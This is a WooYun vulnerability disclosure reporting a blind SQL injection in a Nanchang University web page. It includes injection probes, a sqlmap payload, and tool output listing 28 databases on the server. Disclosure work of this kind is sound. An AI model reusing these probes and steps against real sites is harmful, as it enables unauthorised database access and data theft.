当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-087066

漏洞标题:南昌大学SQL盲注漏洞

相关厂商:南昌大学

漏洞作者: 桃花侠

提交时间:2014-12-15 13:02

修复时间:2015-01-29 13:04

公开时间:2015-01-29 13:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-15: 细节已通知厂商并且等待厂商处理中
2014-12-15: 厂商已经确认,细节仅向厂商公开
2014-12-25: 细节向核心白帽子及相关领域专家公开
2015-01-04: 细节向普通白帽子公开
2015-01-14: 细节向实习白帽子公开
2015-01-29: 细节向公众公开

简要描述:

MSSQL注射,可跨库

详细说明:

http://ndxl.ncu.edu.cn/PsyAssociation/ActivityView.aspx?id=46


http://ndxl.ncu.edu.cn/PsyAssociation/ActivityView.aspx?id=46’


404

http://ndxl.ncu.edu.cn/PsyAssociation/ActivityView.aspx?id=46 and 1=1


原页面

http://ndxl.ncu.edu.cn/PsyAssociation/ActivityView.aspx?id=46 and 1=2


404
or 1=1 列出所有该数据

1.png


带入sqlmap进行注射

---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=46 AND 7998=7998
---
[22:43:22] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[22:43:22] [INFO] fetching database names
[22:43:22] [INFO] fetching number of databases
[22:43:22] [INFO] retrieved: 28
[22:43:40] [INFO] retrieved: bzdmj
[22:44:26] [INFO] retrieved: cnm
[22:44:46] [INFO] retrieved: CommunityElderly
[22:46:45] [INFO] retrieved: counter
[22:47:34] [INFO] retrieved: cyf
[22:47:52] [INFO] retrieved: db_04
[22:48:43] [INFO] retrieved: EAlbum
[22:49:18] [INFO] retrieved: EMHealth
[22:50:16] [INFO] retrieved: ExamArrange
[22:51:37] [INFO] retrieved: JLNYB
[22:52:19] [INFO] retrieved: jy
[22:52:40] [INFO] retrieved: master
[22:53:26] [INFO] retrieved: MaticsoftFK
[22:54:54] [INFO] retrieved: model
[22:55:32] [INFO] retrieved: msdb
[22:56:08] [INFO] retrieved: ndxlcp
[22:57:01] [INFO] retrieved: plusoft_test
[22:58:28] [INFO] retrieved: PrimarySecondary
[23:00:30] [INFO] retrieved: psy
[23:00:53] [INFO] retrieved: Psychological
[23:02:02] [INFO] retrieved: psyq
[23:02:45] [INFO] retrieved: ReportServer
[23:03:51] [INFO] retrieved: ReportServerTempDB
[23:05:45] [INFO] retrieved: RGPsyWeb
[23:06:43] [INFO] retrieved: tempdb
[23:07:29] [INFO] retrieved: xlzxs
[23:08:10] [INFO] retrieved: zjk_xljk
[23:09:07] [INFO] retrieved: Zxx
available databases [28]:
[*] bzdmj
[*] cnm
[*] CommunityElderly
[*] counter
[*] cyf
[*] db_04
[*] EAlbum
[*] EMHealth
[*] ExamArrange
[*] JLNYB
[*] jy
[*] master
[*] MaticsoftFK
[*] model
[*] msdb
[*] ndxlcp
[*] plusoft_test
[*] PrimarySecondary
[*] psy
[*] Psychological
[*] psyq
[*] ReportServer
[*] ReportServerTempDB
[*] RGPsyWeb
[*] tempdb
[*] xlzxs
[*] zjk_xljk
[*] Zxx


漏洞证明:

1.png

修复方案:

版权声明:转载请注明来源 桃花侠@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2014-12-15 13:21

厂商回复:

通知用户处理中

最新状态:

暂无